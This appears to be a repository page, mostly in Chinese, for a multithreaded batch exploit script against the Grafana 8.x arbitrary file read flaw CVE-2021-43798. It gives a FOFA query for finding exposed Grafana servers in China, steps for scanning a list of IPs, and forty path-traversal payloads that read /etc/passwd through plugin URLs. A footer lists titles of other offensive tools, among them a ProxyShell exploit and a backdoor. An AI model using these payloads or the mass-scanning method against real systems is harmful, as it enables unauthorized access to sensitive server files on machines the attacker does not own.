CVE-2021-43798Exp多线程批量验证脚本

Last update: Dec 16, 2021

Overview

Grafana V8.*任意文件读取Exp--多线程批量验证脚本

漏洞描述

Grafana是一个开源的度量分析与可视化套件。经常被用作基础设施的时间序列数据和应用程序分析的可视化，它在其他领域也被广泛的使用包括工业传感器、家庭自动化、天气和过程控制等。其 8.*版本任意文件读取漏洞，该漏洞目前为0day漏洞，未授权的攻击者利用该漏洞，能够获取服务器敏感文件。

FOFA语法

app="Grafana" && country="CN" && body="v8."

使用方法

1.将准备检测的IP地址放入ip.txt文件中
2.运行python3 Grafana-CVE-2021-43798Exp

PAYLOAD

/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stackdriver/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd

CVE-2021-43798Exp多线程批量验证脚本

Related tags

Overview

Grafana V8.*任意文件读取Exp--多线程批量验证脚本

漏洞描述

FOFA语法

使用方法

PAYLOAD

Owner

Generate your own NFTs and their metadata based on your desired probabilities.

An easy-to-use wrapper for NTFS-3G on macOS

一个自动挖掘漏洞的框架，日后会发展成强大的信息收集+漏洞挖掘脚本！

Automatic ProxyShell Exploit

A Python script that can be used to check if a SAP system is affected by CVE-2022-22536

An auxiliary tool for iot vulnerability hunter

User-friendly reference finder in IDA

Apache Solr SSRF(CVE-2021-27905)

Unicode fuzzer for various purposes

A Python tool to automate some dorking stuff to find information disclosures.

Installation of hacking tools

A python implementation of the windows 95 product key check.

Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)

log4j2 passive burp rce scanning tool get post cookie full parameter recognition

Workshop Material on VM-based Deobfuscation

A brute Force tool for Facebook

Lite version of my Gatekeeper backdoor for public use.

Kriecher is a simple Web Scanner which will run it's own checks for the OWASP

LeLeLe: A tool to simplify the application of Lattice attacks.

Local File Inclusion Scanner and Exploiter